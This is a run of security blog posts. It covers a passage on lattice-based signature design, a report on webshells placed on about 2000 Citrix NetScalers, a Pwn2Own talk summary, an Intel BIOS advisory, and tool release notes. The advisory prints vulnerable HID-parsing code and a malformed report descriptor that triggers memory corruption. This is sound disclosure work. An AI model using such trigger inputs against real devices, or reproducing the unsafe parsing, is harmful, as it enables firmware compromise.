As a first try, we might try to define an identification scheme as follows. First, fix a matrix A \in \mathbb{Z}_q^{n \times m} as part of the protocol parameters. Then, for each iteration of the identification scheme, choose a random bounded \vec{y}, commit to it by computing the one way function \vec{w} = A \vec{y}, and respond to challenges as follows:

Unfortunately, this protocol can leak information about Alice’s secret key. Indeed, since the multiplication and addition step \vec{z} = \vec{s}c + \vec{y} is performed over an infinite group – in particular, over a bounded subset of the infinite group, due to practical limitations – the result cannot be uniformly distributed over the resulting space. In particular, edge values of coordinates of \vec{z}, such as particularly large or small values or z_i, leak data about the corresponding coordinates of the secret.

If c=1, signatures risk leaking data about the secret \bar{s}. Indeed, if any coordinate z_i of \vec{z} is equal to 0 for a given signature, then it must be that y_i +cs_i = 0, and hence (since all values are non-negative) that {y}_i = s_i = 0. On the other hand, if any coordinate z_i of \vec{z} is equal to 5m, we must have that {y}_i = 5m-1 and s_i = 1. Similarly, the signature scheme Dilithium chooses c from the set \{-1,0,1\}. In this case, computing \vec{z} = \vec{y} + c\vec{s}_1 leaks information whenever \|\vec{z}\|_\infty is above a particular bound (when \|\vec{z}\|_\infty \geq 5m if the parameters are chosen as above).

Additionally, we also cannot modify \vec{y} to never leak information. Indeed, since \vec{y} is output when c = 0, the distribution of \vec{y} values that don’t leak information would itself leak information about the secret. For instance, if we modified the sampling process of \vec{y} so that y_i is never 0 for any i such that s_i = 0 (to avoid the leakage of the first case described above), then the fact that some coordinates of \vec{y} are never 0 would be discovered when sending the challenge c = 0, and would reveal that those coordinates of the secret \vec{s} are also 0 with high probability.

One possible modification to the identification scheme that can be done to avoid this leakage is simply to make the bounds so large that getting a value of z_i that would leak information happens with negligible probability. Unfortunately, this would lead to much larger key and communication sizes, and would correspond to an easier version of the SIS problem.

The solution to this dilemma is straightforward – simply check whether a given \vec{z} = \vec{s}c + \vec{y} would leak information before responding to a challenge. If it would, we simply abort by sending \vec{z} = \perp (which is a special value rejected by the verifier), and try again. If no information would be leaked, we proceed as usual.2

Determining the success probability of a single round can then allow us to determine the expected number of rounds necessary for the verifier to accept with a given probability. It can be shown that this protocol is witness indistinguishable, so these rounds can be performed in parallel, at the cost of some computation and communication overhead.

However, if this new “identification scheme with aborts” is turned into a signature scheme using the Fiat-Shamir heuristic, then we can do better. Indeed, since the “challenge” is generated from the commitment and message using a cryptographic hash function, the signer simply needs to generate new (random) commitments to retry an aborted round of the identification scheme, and repeat until no data is leaked. This process is called “Fiat-Shamir with Aborts”, and allows a signature to have the same size as the communication costs as a single (successful) round of the identification scheme. Putting it all together, we get the following signature scheme:

KeyGen():

1. \mathrm{sk}: \vec{s} \sim \{0,1\}^m
2. \mathrm{pk}:  \vec{p} = A\vec{s}

Sign(m):

1. Let \sigma = \perp
2. While \sigma = \perp:
   1. For i = 1 .. k, sample \vec{y}_i \sim \{0,...,5m-1\}^m, and let \vec{w}_i = A\vec{y}. Let Y = [\vec{y}_1, ..., \vec{y}_k] and 
      W = [\vec{w}_1,...,\vec{w}_k]
   2. c=H(W, m) \in \{0,1\}^n
   3. For i = 1.. k, \vec{z}_i = \vec{y}_i + c_i \vec{s}. Let Z = [\vec{z}_1,..., \vec{z}_k]
   4. If any coordinate Z_{i,j} is 0 or 5m, set \sigma = \perp. Otherwise, set \sigma = ( Z, W)
3. Return signature \sigma = (Z, W)

Verify(\sigma = (Z, W), m):

1. c' = H(W, m)
2. For i = 1 ..k, check that A\vec{z}_i == c'_i\vec{p} + \vec{w}_i and that all coordinates 0<Z_{i,j}<5m

The signature scheme Dilithium that has been chosen for standardization by NIST is designed using the above template. As the time required to generate a signature depends on the expected number of iterations, parameters are generally selected so that the expected number of iterations required until a valid signature is generated is relatively small. For example, Dilithium is expected to take between 4 and 7 rounds to output a signature.

In general, lattice signature schemes based on the one-way function \vec{x} \to A\vec{x} are very fast, as matrix-vector multiplications are very efficient operations. However, these schemes generally have very large keys and signatures. This is since each key consists of a vector of m elements, and each signature consists of two matrices of m \times k elements, a commitment matrix W and the matrix Z. This results in parameters of a few thousand bytes for public keys and signatures. (In Dilithium, for example, the recommended (optimized) parameters for NIST level III result in a public key size of 1472 bytes, and a signature size of 2701 bytes.) However, there are a number of different optimizations that can be used to reduce the key sizes, possibly at the cost of complexity or of increased computations, which we’ll discuss in the following section.

Options and Optimizations

One straightforward optimization that can be done is to generate the matrix A, which is part of a public key, from a seed, using an extendable output function such as SHAKE. This can then be re-computed by the verifier at a relatively low cost, and avoids having the entire matrix A as part of the pubic key. The matrix A can also be defined as a public parameter of a scheme, with each individual key pair simply consisting of the short value \vec{s} as a secret key, and of A\vec{s} as the public key. However, this requires generating the global parameter A in a trusted method, and, combined with the above optimization, only reduces the size of the public key by the size of the seed, so this optimization is usually not included.

A second common optimization method is to define the lattices over rings or modules. This results in additional structure within the lattices, which can be used to obtain smaller key sizes as well as faster computation speeds. As an example, Dilithium is defined over elements from the polynomial ring \mathbb{Z}_q[X]/(X^{256} + 1), which allows the use of the Number Theoretic Transform (NTT) to speed up matrix-vector multiplications. As a consequence of this change, the signature scheme depends on slightly different security assumptions (the ring/module versions of the existing ones), but these are not currently known to be less secure than their non ring/module counterparts.

Another possible optimization method comes from a modification of the rejection sampling procedure: one can think of the aborts described earlier as a form of rejection sampling with a target uniform distribution. Other target distributions can be used instead, such as a gaussian distribution (or related variant), which allows to minimize the signature size for an equivalent security level, see for example [Lyu11] and [DDLL13]. However, this comes at the cost of additional code complexity, as it requires implementing high-precision gaussian sampling. Hence, some signature schemes, including Dilithium, chose to stick with the standard uniform distribution for rejection sampling for simplicity.

Using a different approach, some additional efficiency can be obtained for an SIS-based signature scheme by introducing a second security assumption, as done by [BG13]. The Learning With Errors (LWE) problem is usually used in lattice-based encryption schemes, and asks to determine the secret \vec{s} when given the pair (A, b = A\vec{s} + \vec{e}), where \vec{e} is a short error vector. The decisional version of the LWE problem asks to distringuish pairs (A, As + e) from pairs generated from a uniform distribution. However, note that we could instead phrase this as the decisional problem of distinguishing the pairs (\bar{A}, \bar{A}\vec{s}) from uniformly random pairs, where \bar{A} = [A|I] and \vec{s} = (\vec{s}_1, \vec{s}_2), since \bar{A}\vec{s} = \bar{A}(\vec{s}_1, \vec{s}_2) =A\vec{s}_1 + I \vec{s}_2 = A\vec{s}_1 + \vec{s}_2 (and is thus exactly an LWE sample provided \vec{s}_1 and \vec{s}_2 are sampled from the appropriate distributions). This allows one to use the same Fiat-Shamir structure to obtain signatures with hardness based on the LWE assumption by modifying the keygen process (in addition to the original hardness assumption of SIS, for technical reasons) – and results in shorter signatures. This optimization is included in Dilithium, and can be seen in their keygen process.

Finally, once the signature framework is fully defined, it is also possible to make additional scheme-specific optimizations or apply compression techniques to minimize the key size. In Dilithium, for example, it was observed that it is possible to compress the signature by omitting some of the low-order bits of some elements in \mathbb{Z}_q, and instead including a vector of one-bit hints that are used to ensure the result of computations is correct.

Conclusion

The description of lattice-based signature schemes can often seem intimidating at first glance, but at the heart of these schemes are the same constructions used for well-known classical signature schemes, with a few small modifications to adapt these constructions to the case of the infinite groups known as lattices.

Since these first lattice-based schemes, many additional techniques have been introduced to mitigate the various drawbacks of lattice primitives, whether that is the large size of keys and signatures in Fiat-Shamir schemes, or the complexity of implementing secure preimage sampling in hash-and-sign schemes. However, these simple constructions can still be found at the core of modern lattice signature schemes today, and will hopefully help gain an intuition for the working of the more complex constructions that are being standardized.

Many thanks to Paul Bottinelli and Giacomo Pope for their careful review. Any remaining errors are mine alone.

Footnotes

1: This hash function is not suitable for all cryptographic applications; while it is collision resistant and one-way, it is not a fully random function (for instance, A(x_1 + x_2) = Ax_1 + Ax_2, which allows one to infer an underlying structure). While this may be a problem for some applications that require the output of a hash function to be indistinguishable from random, it is also often useful in other settings such as in homomorphic encryption.

2: A similar approach can also works in the classical setting: Girault’s ID scheme [Gir90] is a variant of Schnorr’s identification protocol, but computes the discrete log modulo a composite number N and performs the multiplication z = sc + y over the integers. Security comes from choosing a y in a range much larger than that of sc, so no leak occurs with very high probability. In [Lyu08], Lyubashevsky showed that the parameters can be significantly reduced by switching to a variant with aborts.

References

[Falcon]: P. Fouque et al., Falcon: Fast-Fourier Lattice-based Compact Signatures over NTRU, 2020, https://falcon-sign.info/falcon.pdf.

[Dilithium]: S.Bai et al., CRYSTALS-Dilithium Algorithm Specifications and Supporting Documentation (Version 3.1), 2021, https://pq-crystals.org/dilithium/data/dilithium-specification-round3-20210208.pdf.

[Gir90]: M. Girault, An identity-based identification scheme based on discrete logarithms
modulo a composite number, 1990, https://link.springer.com/content/pdf/10.1007/3-540-46877-3_44.pdf.

[Lyu08]: V. Lyubashevsky, Lattice-Based Identification Schemes Secure Under Active Attacks, 2008, https://iacr.org/archive/pkc2008/49390163/49390163.pdf.

[Pei10]: C. Peikert: An Efficient and Parallel Gaussian Sampler for Lattices, 2010, https://eprint.iacr.org/2010/088.pdf.

[Lyu11]: V. Lyubashevsky, Lattice Signatures Without Trapdoors, https://eprint.iacr.org/2011/537.pdf.

[DDLL13]: L. Ducas et al., Lattice Signatures and Bimodal Gaussians, https://eprint.iacr.org/2013/383.pdf.

[BG13]: S. Bai et S. Galbraith, An improved compression technique for signatures based on learning with errors, https://eprint.iacr.org/2013/838.pdf.

Approximately 2000 Citrix NetScalers backdoored in mass-exploitation campaign

Fox-IT (part of NCC Group) has uncovered a large-scale exploitation campaign of Citrix NetScalers in a joint effort with the Dutch Institute of Vulnerability Disclosure (DIVD). An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing webshells on vulnerable NetScalers to gain persistent access. The adversary can execute arbitrary commands with this webshell, even when a NetScaler is patched and/or rebooted. At the time of writing, more than 1900 NetScalers remain backdoored. Using the data supplied by Fox-IT, the Dutch Institute of Vulnerability Disclosure has notified victims.

Figure 1: A global overview of known-compromised Netscalers located in each country, as of August 14th 2023

Main Takeaways

  • A set of vulnerabilities in NetScaler, one of which allows for remote code execution, were disclosed on July 18th. This disclosure followed several security organisations saw limited exploitation of these vulnerabilities in the wild.
  • Fox-IT (in collaboration with the Dutch Institute of Vulnerability Disclosure) have scanned for these webshells to identify compromised systems. Responsible disclosure notifications have been sent by the DIVD.
  • At the time of this exploitation campaign, 31127 NetScalers were vulnerable to CVE-2023-3519.
  • As of August 14th, 1828 NetScalers remain backdoored.
  • Of the backdoored NetScalers, 1248 are patched for CVE-2023-3519.

Recommendations for NetScaler Administrators

  • A patched NetScaler can still contain a backdoor. It is recommended to perform an Indicator of Compromise check on your NetScalers, regardless of when the patch was applied.
    • Fox-IT has provided a Python script that utilizes Dissect to perform triage on forensic images of NetScalers.
    • Mandiant has provided a bash-script to check for Indicators of Compromise on live systems. Be aware that if this script is run twice, it will yield false positive results as certain searches get written into the NetScaler logs whenever the script is run.
  • If traces of compromise are discovered, secure forensic data; It is strongly recommended to make a forensic copy of both the disk and the memory of the appliance before any remediation or investigative actions are done. If the Citrix appliance is installed on a hypervisor, a snapshot can be made for follow-up investigation.
  • If a webshell is found, investigate whether it has been used to perform activities. Usage of the webshell should be visible in the NetScaler access logs. If there are indications that the webshell has been used to perform unauthorised activities, it is essential to perform a larger investigation, to identify whether the adversary has successfully taken steps to move laterally from the NetScaler, towards another system in your infrastructure.

Investigation and Disclosure Timeline

July 2023: Identifying disclosing NetScalers vulnerable to CVE-2023-3519

Recently, three vulnerabilities were reported to be present in Citrix ADC and Citrix Gateway. Based on the information shared by Citrix, one of these vulnerabilities (CVE-2023-3519) gives an attacker the opportunity to perform unauthenticated remote code execution. Citrix, and various other organisations, also shared information regarding the fact that this vulnerability is actively being exploited in the wild.

At the time that Citrix disclosed information about CVE-2023-3519, details on how this vulnerability could be exploited were not publicly known. Using prior research on the identification of Citrix versions, we were able to quickly identify which Citrix servers on the web were vulnerable for CVE-2023-3519. This information was shared with the Dutch Institute of Vulnerability Disclosure (DIVD), who were able to notify administrators that they had vulnerable NetScalers exposed to the internet.

About the Dutch Institute of Vulnerability Disclosure (DIVD):

DIVD is a Dutch research institute that works with volunteers who aim to make the digital world safer by searching the internet for vulnerabilities and reporting the findings to those who can fix these vulnerabilities.

https://www.divd.nl/code/

In parallel with sharing the data with the DIVD, Fox-IT and NCC Group cross-referenced their scan data with their customer base to inform managed services customers shortly prior to the DIVD disclosure.

August 8th and 9th 2023: Identifying backdoored NetScalers

In July and August, the Fox-IT CERT (part of NCC Group) responded to several incidents related to CVE-2023-3519. Several webshells were found during these investigations. Based on both the findings of these IR engagements as well as Shadowserver’s Technical Summary of Observed Citrix CVE-2023-3519 Incidents, we were confident that the adversary had exploited at a large scale in an automated fashion.

While the discovered webshells return a 404 Not Found, the response still differs from how Citrix servers ordinarily respond to a request for a file that does not exist. Moreover, the webshell will not execute any commands on the target machine unless given proper parameters. These two factors combined allow us to scan the internet for webshells with high confidence, without impacting affected NetScalers.

In cooperation with the DIVD we decided to scan NetScalers accessible on the internet for known webshell paths. These scans may be recognized in Citrix HTTP Access logs by the User-Agent: DIVD-2023-00033. We initially only scanned systems that were not patched on July 21st, as the exploitation was believed to be between July 20th and July 21st. Later, we decided to also scan the systems that were already patched on July 21st. The results exceeded our expectations. Based on the internet wide scan, approximately 2000 unique IP addresses seem to have been backdoored with a webshell as of August 9th.

August 10th: Responsible Disclosure by the DIVD

Starting from August 10th, the DIVD has begun reaching out to organisations affected by the webshell. They used their already existing network and responsible disclosure methods to notify network owners and national CERTs. It however remains possible that this notification doesn’t reach the right people in time. We would therefore like to repeat the advice to manually perform an IOC check on your internet exposed NetScaler devices.

Findings

Most apparent from our scanning results is the percentage of patched NetScalers that still contain a backdoor. At the time of writing, approximately 69% of the NetScalers that contain a backdoor are not vulnerable anymore to CVE-2023-3519. This indicates that while most administrators were aware of the vulnerability and have since patched their NetScalers to a non-vulnerable version, they have not been (properly) checked for signs of successful exploitation.

Figure 2: The large majority of known compromised NetScalers are patched.

Thus, administrators may currently have a false sense of security even though an up to date Netscaler can still have been backdoored. The high percentage of patched NetScalers that have been backdoored is likely a result of the time at which mass exploitation took place. From incident response cases, we can confirm Shadowserver’s prior estimate that this specific exploitation campaign took place between late July 20th and early July 21st:

Figure 3: While patches were being applied, exploitation took place at a large scale between July 20th and July 21st.

We could not discern a pattern in the targeting of NetScalers. We have seen some systems that have been compromised with multiple webshells, but we also see large volumes of NetScalers that were vulnerable between July 20th and July 21st have not been compromised with a backdoor. In total we have found 2491 webshells across 1952 distinct NetScalers. Globally, there were 31127 NetScalers vulnerable to CVE-2023-3519 on July 21st, meaning that the exploitation campaign compromised 6.3% of all vulnerable NetScalers globally.

Figure 4: Amount of Compromised NetScalers per country as of August 14th 2023
Figure 5: Amount of vulnerable NetScalers per country as of July 21st 2023

It appears the majority of compromised NetScalers reside in Europe. Of the top 10 affected countries, only 2 are located outside of Europe. There are stark differences between countries in terms of what percentage of their NetScalers were compromised. For example, while Canada, Russia and the United States of America all had thousands of vulnerable NetScalers on July 21st, virtually none of these NetScalers were found to have a webshell on them. As of now, we have no clear explanation for these differences, nor do we have a confident hypothesis to explain which NetScalers were targeted by the adversary and which ones were not. Moreover, we do not see a particular targeting in terms of victim industry.

As of August 14th, 1828 NetScalers remain compromised. While we see a decline in the amount of compromised NetScalers following the disclosure on August 10th, we hope that this publication can raise further awareness that backdoors can persist even when Citrix servers are updated. Therefore, we again recommend any NetScaler administrator to perform basic triage on their NetScalers.

Conclusion

The monitoring and protection of edge devices such as NetScalers remains challenging. Sometimes, the window in which defenders must patch their systems is incredibly small. CVE-2023-3519 was exploited in targeted attacks before a patch was available and was later exploited on a large scale. System administrators need to be aware that adversaries can exploit edge devices to place backdoors that persist even after updates and / or reboots. As of now, it is strongly advised to check NetScalers, even if they have been patched and updated to the latest version. Resources are available at the Fox-IT GitHub.

References

SysPWN – VR for Pwn2Own

Alex Plaskett (@alexjplaskett) presented a talk on the 10th of August 2023 at @SysPWN covering vulnerability research for Pwn2Own.

The first section of the talk covered a high-level perspective of the event, personal history, and teams. It then discussed some considerations needing to be made when deciding on target, experiences, and learnings from the competition.

The second section of the talk was divided into vulnerabilities with NCC Group EDG used at the event in 2021 and 2022.

The first category covered was in the Soho Smash-Up which targeted the Ubiquiti EdgeRouter to first obtain code execution via the WAN interface, this was then used to pivot to exploiting a Lexmark printer attached via the LAN interface.

The second category discussed was an exploit used against a Lexmark printer via Printer Job Language (PJL) input to compromise the printer.

The slides for the talk are available here:

Intel BIOS Advisory – Memory Corruption in HID Drivers 

This advisory is the third in a series of posts that cover vulnerabilities I found while auditing the “ICE TEA” leak, which resulted in the exposure of Intel’s and Insyde Software’s proprietary BIOS source code. The other two blog posts can be found here (TOCTOU in Intel SMM) and here (multiple memory safety issues in Insyde Software SMM).

In this post, I will be focusing on two additional BIOS vulnerabilities. The first bug impacts the Bluetooth keyboard driver (HidKbDxe in BluetoothPkg) and the second bug impacts a touch panel driver (I2cTouchPanelDxe in AlderLakePlatSamplePkg).  

Both vulnerabilities were fixed by Intel on August 8th with the 2023.3 IPU release. Intel’s advisory can be found here

What The HID?

To understand the issues that I will be covering in this blog, it is necessary to very briefly introduce the relevant portions of the HID specification – the Report Descriptor data structure. 

First of all, HID stands for Human Interface Device. Unsurprisingly, HID devices allow humans to interact with a computer. Products like keyboards, mice, gaming controllers, and touchscreens are all examples of HID devices. 

The HID specification requires that every device must define the format of its data packets in a structure known as the Report Descriptor. The HID device sends this Report Descriptor to the host to convey various things, such as how many different packet types (Reports) are supported, the packet sizes, and the purpose (Usage) of each packet.  

How information is organized in a Report Descriptor (Section 5.4 of the HID spec)

Shown below is the Report Descriptor for my mouse. Note the defined Usages for the Button and Wheel, which I think we’d all agree are typical mouse-like features we expected to find. By the way, each element in a Report Descriptor (the below rows) is called an Item

0x05, 0x01, // Usage Page (Generic Desktop Ctrls) 
0x09, 0x02, // Usage (Mouse) 
0xA1, 0x01, // Collection (Application) 
0x09, 0x01, //   Usage (Pointer) 
0xA1, 0x00, //   Collection (Physical) 
0x05, 0x09, //     Usage Page (Button) 
0x19, 0x01, //     Usage Minimum (0x01) 
0x29, 0x08, //     Usage Maximum (0x08) 
0x15, 0x00, //     Logical Minimum (0) 
0x25, 0x01, //     Logical Maximum (1) 
0x75, 0x01, //     Report Size (1) 
0x95, 0x08, //     Report Count (8) 
0x81, 0x02, //     Input (Data, Var, Abs, No Wrap, Linear, Preferred State, No Null Position) 
0x05, 0x01, //     Usage Page (Generic Desktop Ctrls) 
0x09, 0x30, //     Usage (X) 
0x09, 0x31, //     Usage (Y) 
0x09, 0x38, //     Usage (Wheel) 
0x15, 0x81, //     Logical Minimum (-127) 
0x25, 0x7F, //     Logical Maximum (127) 
0x75, 0x08, //     Report Size (8) 
0x95, 0x03, //     Report Count (3) 
0x81, 0x06, //     Input (Data, Var, Rel, No Wrap, Linear, Preferred State, No Null Position) 
0xC0,       //   End Collection 
0xC0,       // End Collection 

Once the host driver has processed the Report Descriptor, it is then able to communicate with the peripheral device. It does this by sending or receiving Report packets. There are three types of Reports: 

  • Input Reports: Data sent from the device to the host (e.g., a mouse reporting that a button has been pressed)
  • Output Reports: Data sent from the host to the device (e.g., the host requesting that your keyboard turn on/off an LED)
  • Feature Reports: Data sent in either direction (e.g., configuration or calibration data) 

The important takeaway from all of this is that these Reports and Report Descriptors are fully attacker controlled. A malicious HID device could send arbitrary data in these packets. For example, a descriptor could have malformed Report Size or Report Count values, or it could contain an excessive number of Usage Pages or Collections. The host driver that communicates with the HID peripheral must parse these structures extremely carefully to avoid memory safety problems. 

Memory Corruption Due to Malformed Bluetooth Keyboard HID Report (CVE-2022-44611)

CVSS 6.9 <CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L> 

Impact

A remote attacker that is positioned within Bluetooth proximity to the victim device can corrupt BIOS memory by sending malformed HID Report structures. 

Description

The BtHidParseReportMap() function (not shown) is responsible for performing the initial shallow parsing of the Report Descriptor that was received from a Bluetooth keyboard. After this parsing is complete, the Report Descriptor is saved, and any driver feature that needs it can call the GetReportFormatList() function.  

Shown below is one example where the Descriptor is accessed so that the driver can determine whether the keyboard has LEDs so that it can turn them on or off by sending an Output Report.  

EFI_STATUS SetKeyLED ( IN HID_KB_DEV *HidKbDev  ) 
{ 
  ... 
  LIST_ENTRY     *Link; 
  LIST_ENTRY     *Cur; 
  ... 
  HidKbDev->Hid->GetReportFormatList(HidKbDev->Hid,  Link); 
  Cur = GetFirstNode (Link); 
  ... 

This function first walks the Report’s items and searches for all LED-related Usage Pages, which it then processes to calculate the total size of the Output Report in HidKbDev->OutLedReportSize.  

  ... 
  UINT8          *Data; 
  ... 
  HID_REPORT_FMT *ReportItem; 
  ... 
  if (HidKbDev->OutLedReportSize == 0){ 
    while (!IsNull (Link, Cur)) { 
      ReportItem = ITEM_FROM_LINK(Cur); 
      if (ReportItem->UsagePage == BT_HID_LED_USAGE_PAGE) 
        HidKbDev->OutLedReportSize = HidKbDev->OutLedReportSize  
                        + (ReportItem->ReportCount * ReportItem->ReportSize); 
      Cur = GetNextNode (Link, Cur); 
    } 
    Cur = GetFirstNode (Link); 
  } 
  Data = (UINT8 *)AllocateZeroPool(HidKbDev->OutLedReportSize/8); 
  ... 

Unfortunately, the function doesn’t properly account for Usage Pages with zero-sized Report Count fields, nor does it properly handle Usage Pages whose product of Count and Size is not a multiple of 8. So, for the sake of argument, let’s imagine the malicious Bluetooth keyboard that presents a malformed descriptor that is composed of multiple LED Usage Pages, structured like this: 

  • Almost all pages have a ReportCount=0 and a ReportSize=7 
  • Followed by a single page that has a ReportCount=1 and a ReportSize=8 

This will result in HidKbDev->OutLedReportSize being equal to 8, because the sum that is calculated by the while-loop (0*7 + 0*7 + … + 1*8) is simply 8. In this case, Data would point to a 1-byte buffer that is allocated on the heap. 

Next, the function will walk the Report list for a second time, once again seeking all LED-related Usage Pages.  

  UINT32         ByteIndex; 
  UINT32         BitIndex; 
  ... 
  ByteIndex = 0;  
  BitIndex  = 0;  
  ... 
  while (!IsNull (Link, Cur)) { 
    ReportItem = ITEM_FROM_LINK(Cur); 
    if (ReportItem->UsagePage == BT_HID_LED_USAGE_PAGE) { 
      ... 
      for (Index = ReportItem->UsageMin; Index <= ReportItem->UsageMax; Index++) { 
        if (HidKbDev->LedKeyState[Index] == TRUE) { 
          BitMask = Data[ByteIndex]; 
          BitMask = BitMask | (1 << BitIndex); 
          Data[ByteIndex] = BitMask; 
        } 
 
        BitIndex += ReportItem->ReportSize; 
        if (BitIndex == 7){ 
          ByteIndex ++; 
          BitIndex = 0;  
        } 
      }     
    }     
    Cur = GetNextNode (Link, Cur); 
  } 
  ... 

Above, the attacker has control over the UsageMin and UsageMax items, which can take on values as large as 255, even though LedKeyState[] has only 78 elements. This will cause the for-loop to take an excessive number of iterations.

Note also that BitIndex is attacker-controlled because it was derived from the attacker-controlled item named ReportItem->ReportSize. As I hinted earlier, the malformed descriptor will contain multiple Usage Pages which all have a Report Size of 7. This will force BitIndex to be 7 on each iteration of the for-loop, causing the “if(BitIndex==7)” condition to be entered each time. This will force ByteIndex to be incremented an excessive number of times.

Ultimately, this can lead to memory corruption, because ByteIndex is used as an offset adjustment when writing into Data[], the previously allocated 1-byte heap buffer.

The malformed Report Descriptor that triggers this bug might look something like this: 

... 
// Multiple LED Usage Pages with: 
// - The broadest UsageMin/Max range (0-255) 
// - ReportSize of 7 and ReportCount of 0 
0x05, 0x08,        //     Usage Page (LED) 
0x19, 0x00,        //     Usage Minimum (0x00) 
0x29, 0xFF,        //     Usage Maximum (0xFF) 
0x75, 0x07,        //     Report Size (7) 
0x95, 0x00,        //     Report Count (0) 
// Repeated approximately 50 times ... 
... 
// NCC: One single Usage Page where ReportSize=8 and Count=1 
0x05, 0x08,        //     Usage Page (LED) 
0x19, 0x00,        //     Usage Minimum (0x00) 
0x29, 0xFF,        //     Usage Maximum (0xFF) 
0x75, 0x08,        //     Report Size (8) 
0x95, 0x01,        //     Report Count (1) 
... 

In terms of impact and exploitability, I should admit that I didn’t PoC this bug, and instead discovered it by pure code review. Although I haven’t ruled out exploitation, I admit that it may be difficult to translate this out-of-bounds write into arbitrary code execution for two reasons: 

  1. Due to how the value of BitMask is entangled with BitIndex and Data[ByteIndex]. That is, the BitMask value is read from Data[], modified, and written back into the same position. 
  2. The out-of-bounds writes are limited by the maximum value of ByteIndex, which is constrained by two additional factors: 
    • The range of UsageMin to UsageMax (255), which controls the number of iterations taken by the for-loop. 
    • The number of Usage Pages that can fit in the Descriptor, which controls the number of iterations taken by the while-loop. A rough calculation shows that approximately 50 Usage Pages can fit in the 512-byte report map (BT_HID_REPORT_MAP_LEN). 

Memory Corruption When Parsing Touch HID Report Stack

Impact

This vulnerability impacts another class of HID devices: touch panels, which transmit HID data over an I2C bus to the host. Unlike the previous bug which was exploitable by remote-but-nearby attackers via Bluetooth, this bug can only be exploited by a physical attacker who disassembles the laptop and tampers with I2C bus traffic. This may be accomplished by: 

  1. Implanting an interposer device which actively mutates HID reports as they are transmitted over the I2C serial bus. 
  2. Flashing malicious firmware onto the existing touch panel. 
  3. Replacing the entire touch panel or its microcontroller with one under the attacker’s control. 

An attacker that achieves this degree of physical access will be able to present the BIOS with a malformed HID Report. While parsing the tokenized report, memory corruption will occur in the BIOS, which could lead to code execution. 

Although the potential impact is high due to the possibility of code execution, the overall risk rating is tempered by the physical access requirement. Intel has a policy to not issue CVEs for vulnerabilities that involve “open chassis” attacks. 

Description

In the following code snippet, we can observe that a descriptor may contain multiple COLLECTION tokens. If an excessive number of these token types are present, the array index named CollectionCount will be repeatedly incremented. This can cause the value to become larger than the maximum valid index of the Stack->TempReport.Collection[] array.  

VOID UpdateStack( PARSER_STACK* Stack, TOKEN Token, INPUT_REPORT_TABLE* ReportTable ) 
{ 
  switch (Token.ID) { 
  ... 
  case COLLECTION: 
    ... 
    else if (Token.Value == LOGICAL) 
    { 
      if (Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 1].ValidCollection  
            == TRUE) 
      { 
        Stack->TempReport.CollectionCount += 1; 
        Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 1].BitsTotal =  
          Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 2].BitsTotal; 
      } 
      Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 1].ValidCollection =  
        TRUE; 
    } 
    break; 
  ... 

If an attacker were to trigger this bug, all subsequent writes to the Collection[] array (256 elements in size) would corrupt memory beyond the end of the report stack, which resides on the heap. 

Disclosure Timeline 

  • October 12, 2022: NCC Group reports both vulnerabilities to Intel. Intel’s triage bot responds immediately indicating that the report has been sent to reviewers for disposition. 
  • December 7, 2022: NCC Group requests an update. Intel responds that the Bluetooth vulnerability is accepted as valid, but indicates that the I2C vulnerability is not valid due to the physical access requirement. However, Intel nonetheless intends to patch the weakness, so public disclosure is discouraged until they have shipped a BIOS update. 
  • January 18, 2023: Intel shares the CVE number and indicates that disclosure is targeted for later this year, in August. 
  • August 8, 2023: Disclosure publication in IPU 2023.3

Tool Release – ScoutSuite 5.13.0

We are excited to announce the release of a new version of our open-source, multi-cloud auditing tool ScoutSuite (on GitHub)!

This version includes multiple new rules and findings for Azure, which align with some of the latest CIS Benchmark checks, multiple bug fixes and feature enhancements, and minor finding template corrections. Supported Python versions have also been updated to cover versions 3.9 and newer.

The most significant changes are:

Core

  • Added support for Python versions >= 3.9; versions 3.8 and older are no longer recommended and support will not be provided for issues with these versions
  • Secret redaction logic improvements
  • Multiple error handling improvements

AWS

  • Multiple bugfixes for checks
  • Multiple minor corrections for finding templates

Azure

  • Multiple bugfixes for checks
  • Multiple minor corrections for finding templates
  • Updated azure-mgmt-authorization module to v3.0.0
  • Added new rules for several Azure CIS Benchmark checks

GCP

  • Multiple bugfixes for checks
  • Multiple minor corrections for finding templates

Check out the Github page and the Wiki documentation for more information about ScoutSuite.

For those wanting a Software-as-a-Service version, we also offer NCC Scout. This service includes persistent monitoring, as well as coverage of additional services across the three major public cloud platforms. If you would like to hear more, reach out to [email protected] or visit our cyberstore!

We would like to express our gratitude to all our contributors:

@FlorinAsavoaie
@yaleman
@tkmru
@elimisteve
@rbailey-godaddy
@rscottbailey
@x4v13r64
@twilson-bf
@x64-latacora
@zachfey
@wrightmalone
@fl0mb
@ncc-akis
@saez0pub
@HIKster
@cckev

Tool Release: Cartographer

Introduction

There’s no doubt that reverse engineering can be a very complex and confusing matter, even for those that love doing it. Jumping into a program and being greeted with tons of assembly and weirdly-named functions and variables is hardly what most would call a fun time. Not to mention that identifying specific functionality in a program can be an exercise in sanity at times.

That’s why today we’re releasing Cartographer: A Ghidra plugin for mapping out code coverage data.

Cartographer simplifies the complexities of reverse engineering by allowing researchers to visually observe which parts of a program were executed, obtain details about each function’s execution, compare different runs of the same program, and much more.

GitHub link: https://github.com/nccgroup/Cartographer

Overview

Back in 2017, there was a new and incredibly useful plugin for IDA Pro called Lighthouse, which not only colorized code coverage data, but it also provided many useful tools for researchers, such as displaying function heat maps and the ability to perform logical operations on multiple loaded coverages.

When Ghidra was released back in 2019, many researchers (myself included) eagerly awaited a version of Lighthouse for Ghidra. When 2022 rolled around and there was still no sign of a Ghidra version of Lighthouse, I decided to make my own.

Cartographer implements much of the same functionality as Lighthouse while also providing its own enhancements and offering additional Ghidra-specific functionality, such as the ability to load coverage data for binary overlays (i.e. segments that occupy the same memory addresses, but are located in different address spaces).

Below are two case studies showing the practical uses of Cartographer and how it can complement the reverse engineering workflow.

Case Study: AES Crypt

AES Crypt is a utility that encrypts and decrypts files utilizing AES. In August 2022, a critical vulnerability was discovered in the code for the Linux version of AES Crypt, specifically the code that prompts for user input.

Originally, this section was going to recreate that vulnerability and demonstrate how this sort of issue would be found using Cartographer. In fact, the entire setup and workflow for the demonstration had been entirely completed.

